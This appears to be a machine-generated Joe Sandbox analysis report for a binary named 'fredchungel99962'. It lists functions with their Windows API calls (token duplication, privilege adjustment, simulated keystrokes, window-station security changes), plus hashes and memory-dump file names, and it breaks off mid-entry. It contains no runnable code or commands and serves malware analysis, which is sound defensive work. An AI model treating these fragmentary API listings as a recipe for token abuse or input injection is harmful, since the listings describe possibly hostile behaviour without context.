Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 89dac9e769dd52253c517a361b05e349b87f8cfa5d49736caf237ace33394b45
Instruction ID: a52e6ca8fe99b1d3072e3be70004b077966d0e95dfe8cfebb00f1c6ec1030a5e
Opcode Fuzzy Hash: 89dac9e769dd52253c517a361b05e349b87f8cfa5d49736caf237ace33394b45
Instruction Fuzzy Hash: 00F01C71525792CFDB34AF64D4D8862BBE4AF04359314896EE2DB83512C7719844CF50

Uniqueness

Uniqueness Score: -1.00%

Function 012B2DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE ref: 012B2DC4

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: d60b3214fbf2d27b0e5de7385d5a2278c59d1aee3378d6e012ae8d8ca1dccf32
Instruction ID: 1b7a2ca589e43bf0dfccbc24061078f39d37e4a21bb6119ac436dd7023af165e
Opcode Fuzzy Hash: d60b3214fbf2d27b0e5de7385d5a2278c59d1aee3378d6e012ae8d8ca1dccf32
Instruction Fuzzy Hash: D8E0CD766012245BCB2092589C05FEA77EDDFC87D0F040175FD09E7248D960AD808650

Uniqueness

Uniqueness Score: -1.00%

Function 01322693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 013226B5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: b1a3649b0a0d8efe5e50420873eebe7ef62fb2918f9b3d273f76cfd30e638bf0
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 72E04FB1609B105FDF396E28AC517B777E89F49314F00086EF69BC2252E5B268458A4D

Uniqueness

Uniqueness Score: -1.00%

Function 012B2B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 012B3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 012B3908

Part of subcall function 012BD730: GetInputState.USER32 ref: 012BD807

SetCurrentDirectoryW.KERNEL32(?), ref: 012B2B6B

Part of subcall function 012B30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 012B314E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: de8533d95bbbd9cdbba24131e1e5c26f8be78dde0e0753f75db49cca6cfaa62b
Instruction ID: 218d2dc5c57fbaeb56d21c28258f5b536e8885ec7390e885181ece6f8a6740e1
Opcode Fuzzy Hash: de8533d95bbbd9cdbba24131e1e5c26f8be78dde0e0753f75db49cca6cfaa62b
Instruction Fuzzy Hash: 2CE0862531434647CA18FB7894D05FDB76DABE53D5F40153EE14293152DE24558A4352

Uniqueness

Uniqueness Score: -1.00%

Function 012F039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,012F0704,?,?,00000000), ref: 012F03B7

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8366dad3e09bf84a8acdc12d8d33674b3393eede5fb1a91d6cc71e9f9f2efdd0
Instruction ID: 2020788f10bebd8c10b69b5f626a262d518068556f3b7df8f20255e1a27f19d8
Opcode Fuzzy Hash: 8366dad3e09bf84a8acdc12d8d33674b3393eede5fb1a91d6cc71e9f9f2efdd0
Instruction Fuzzy Hash: F6D06C3204010DBBDF128E84DD06EDA3BAAFB48714F014000FE1856020C732E821AB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B1CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 012B1CBC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 3462e16dace8db0151b5b7b5ae4b95215767bf35b69698d48ff63617e83727f0
Instruction ID: e576f70f631af9a4ee1710108dbe9a84c691ce488e0c73722127cd8cd3f841bb
Opcode Fuzzy Hash: 3462e16dace8db0151b5b7b5ae4b95215767bf35b69698d48ff63617e83727f0
Instruction Fuzzy Hash: 6DC04C35280304DFE2254781B84AF597758A348B00F044001F609555CB86A11410D750

Uniqueness

Uniqueness Score: -1.00%

Function 0132744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 012B5745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 012B5773

GetLastError.KERNEL32(00000002,00000000), ref: 013276DE

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 359e800caa7457c7422f7389d96a0d4c44e1e890eb2eee084c3339ed21556877
Instruction ID: 62b8246f883295da70f1d3a917f3695274c0519e1fc9413dc6a9a21c1ff0eab6
Opcode Fuzzy Hash: 359e800caa7457c7422f7389d96a0d4c44e1e890eb2eee084c3339ed21556877
Instruction Fuzzy Hash: 9581B0302143129FCB15EF28C4D0BB9B7E1BFA8768F04456DE9965B3A1DB30E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 012CFC70 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 012CFD1F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 64076acd1d55a838965eee8c765208f49e759864e7c988d724c8a0efdf8ee7d6
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: AB311774A10106DBD718CF59D680969FBB2FF49700B2483A9EA09CB652D731EEC1CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 001D22FC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 001D2311

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: e332441c7ac77ee184f68e80d9309b316c74b3d08e9ebacfd8d7f3eff8c970de
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 25E09A7494010DAFDB00EFA8D5496AE7BB4EF04301F1005A1FD0596680DB309A548A62

Uniqueness

Uniqueness Score: -1.00%

Function 001D2300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 001D2311

Memory Dump Source

Source File: 00000005.00000002.347993788.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_fredchungel99962.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 126b667646cf75930e4ec7d8c2b1985523aa026de17ed87c0215772dd47661ef
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: C2E0BF7494010DAFDB00EFB8D5496AE7BB4EF04301F100561FD0192280D73099508A62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01349576 Relevance: 75.9, APIs: 39, Strings: 4, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0134961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0134965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0134969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 013496C9
SendMessageW.USER32 ref: 013496F2
GetKeyState.USER32(00000011), ref: 0134978B
GetKeyState.USER32(00000009), ref: 01349798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 013497AE
GetKeyState.USER32(00000010), ref: 013497B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 013497E9
SendMessageW.USER32 ref: 01349810
SendMessageW.USER32(?,00001030,?,01347E95), ref: 01349918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0134992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 01349941
SetCapture.USER32(?), ref: 0134994A
ClientToScreen.USER32(?,?), ref: 013499AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 013499BC
InvalidateRect.USER32(?,00000000,00000001), ref: 013499D6
ReleaseCapture.USER32 ref: 013499E1
GetCursorPos.USER32(?), ref: 01349A19
ScreenToClient.USER32(?,?), ref: 01349A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 01349A80
SendMessageW.USER32 ref: 01349AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 01349AEB
SendMessageW.USER32 ref: 01349B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 01349B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 01349B4A
GetCursorPos.USER32(?), ref: 01349B68
ScreenToClient.USER32(?,?), ref: 01349B75
GetParent.USER32(?), ref: 01349B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 01349BFA
SendMessageW.USER32 ref: 01349C2B
ClientToScreen.USER32(?,?), ref: 01349C84
TrackPopupMenuEx.USER32 ref: 01349CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 01349CDE
SendMessageW.USER32 ref: 01349D01
ClientToScreen.USER32(?,?), ref: 01349D4E
TrackPopupMenuEx.USER32 ref: 01349D82

Part of subcall function 012C9944: GetWindowLongW.USER32(?,000000EB), ref: 012C9952

GetWindowLongW.USER32(?,000000F0), ref: 01349E05

Strings

H`r, xrefs: 013498D6
@GUI_DRAGID, xrefs: 0134997D
F, xrefs: 01349D07
8lr, xrefs: 01349728, 01349894, 013498B7, 013498EF, 01349A3C, 01349BB7, 01349C5E, 01349C8E, 01349D2C, 01349D58, 01349DA1, 01349DF2, 01349E16, 01349E40

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: 8lr$@GUI_DRAGID$F$H`r
API String ID: 3429851547-1941778944
Opcode ID: b8784e73816e94cd838467595f1dbb1526d0a7362818717b72ce8119e6650b93
Instruction ID: e34b6fd8246863f7b113f2c9f3e7ecf68479576c9d6cca40e08fd58dda58d23c
Opcode Fuzzy Hash: b8784e73816e94cd838467595f1dbb1526d0a7362818717b72ce8119e6650b93
Instruction Fuzzy Hash: 35425A34205201AFEB25CF28C844FABBBE9EF4D328F144619F699872A1D735B855CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01344873 Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 013448F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 01344908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 01344927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0134494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0134495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0134497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 013449AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 013449D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 01344A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01344A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 01344A7E
IsMenu.USER32(?), ref: 01344A97
GetMenuItemInfoW.USER32 ref: 01344AF2
GetMenuItemInfoW.USER32 ref: 01344B20
GetWindowLongW.USER32(?,000000F0), ref: 01344B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 01344BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 01344C82
wsprintfW.USER32 ref: 01344CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01344CC9
GetWindowTextW.USER32 ref: 01344CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01344D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 01344D33
GetWindowTextW.USER32 ref: 01344D5A

Strings

%d/%02d/%02d, xrefs: 01344CA8
8lr, xrefs: 0134489F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d$8lr
API String ID: 4054740463-3553350246
Opcode ID: cda28a8c9dc1469414cb2b0fb9bb28e0e97246f79ef0909ca3215d9f94c38b79
Instruction ID: e8d214b8bd526493952b1f1b5fbf65957d3399e7eaca04f201e9b2d20079d49d
Opcode Fuzzy Hash: cda28a8c9dc1469414cb2b0fb9bb28e0e97246f79ef0909ca3215d9f94c38b79
Instruction Fuzzy Hash: 3912F171600259ABFB258F28CD48FAEBBF8EF45718F044129FA16DB2D1DB74A941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012CF98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 012CF998
FindWindowW.USER32 ref: 0130F474
IsIconic.USER32(00000000), ref: 0130F47D
ShowWindow.USER32(00000000,00000009), ref: 0130F48A
SetForegroundWindow.USER32(00000000), ref: 0130F494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0130F4AA
GetCurrentThreadId.KERNEL32 ref: 0130F4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0130F4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 0130F4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 0130F4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0130F4DE
SetForegroundWindow.USER32(00000000), ref: 0130F4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 0130F4F6
keybd_event.USER32 ref: 0130F501
MapVirtualKeyW.USER32(00000012,00000000), ref: 0130F50B
keybd_event.USER32 ref: 0130F510
MapVirtualKeyW.USER32(00000012,00000000), ref: 0130F519
keybd_event.USER32 ref: 0130F51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0130F528
keybd_event.USER32 ref: 0130F52D
SetForegroundWindow.USER32(00000000), ref: 0130F530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 0130F557

Strings

Shell_TrayWnd, xrefs: 0130F46F

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: d22e8c8d184bd95f7a228dddf8e9a0de47fc86725b82158769896df7598c25be
Instruction ID: 7399dac38a61882d8408c28b7a532875430302c98287c1ff36a74b52f3541f12
Opcode Fuzzy Hash: d22e8c8d184bd95f7a228dddf8e9a0de47fc86725b82158769896df7598c25be
Instruction Fuzzy Hash: 65317075A41318BFEB316BB65C4AFBF7EACEB44B54F101055FA00E61C1CAB16900ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 01311201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 013116C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0131170D
Part of subcall function 013116C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0131173A
Part of subcall function 013116C3: GetLastError.KERNEL32 ref: 0131174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 01311286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 013112A8
CloseHandle.KERNEL32(?), ref: 013112B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 013112D1
GetProcessWindowStation.USER32 ref: 013112EA
SetProcessWindowStation.USER32 ref: 013112F4
OpenDesktopW.USER32 ref: 01311310

Part of subcall function 013110BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,013111FC), ref: 013110D4
Part of subcall function 013110BF: CloseHandle.KERNEL32(?), ref: 013110E9

Strings

default, xrefs: 0131130B
, xrefs: 0131125A
winsta0, xrefs: 013112CC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 86bb5afdfff8d3ebbb6acfb2be70a0243ffd8ff762b9015c601c3a8b3a1fc7cc
Instruction ID: 0f9db5f57ec0603608e9cc9743ec4b7aaf3235045dc3cdc19bd9c5f1187a4284
Opcode Fuzzy Hash: 86bb5afdfff8d3ebbb6acfb2be70a0243ffd8ff762b9015c601c3a8b3a1fc7cc
Instruction Fuzzy Hash: EC818D71A40209AFEF299FA8DC48BEE7FB9EF04B08F144129FA10B6154DB359944CB61

Uniqueness

Uniqueness Score: -1.00%

Function 01310B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 013110F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 01311114
Part of subcall function 013110F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 01311120
Part of subcall function 013110F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 0131112F
Part of subcall function 013110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01310B9B,?,?,?), ref: 01311136
Part of subcall function 013110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0131114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01310BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01310C00
GetLengthSid.ADVAPI32(?), ref: 01310C17
GetAce.ADVAPI32(?,00000000,?), ref: 01310C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01310C6D
GetLengthSid.ADVAPI32(?), ref: 01310C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 01310C8C
HeapAlloc.KERNEL32(00000000), ref: 01310C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 01310CB4
CopySid.ADVAPI32(00000000), ref: 01310CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01310CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01310D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 01310D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01310D45
HeapFree.KERNEL32(00000000), ref: 01310D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01310D55
HeapFree.KERNEL32(00000000), ref: 01310D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01310D65
HeapFree.KERNEL32(00000000), ref: 01310D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 01310D78
HeapFree.KERNEL32(00000000), ref: 01310D7F

Part of subcall function 01311193: GetProcessHeap.KERNEL32(00000008,01310BB1,?,00000000,?,01310BB1,?), ref: 013111A1
Part of subcall function 01311193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01310BB1,?), ref: 013111A8
Part of subcall function 01311193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01310BB1,?), ref: 013111B7

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: bb756234144032afdae0bfd0da9d1a969488ff8b0e38b48d2923547ad4181347
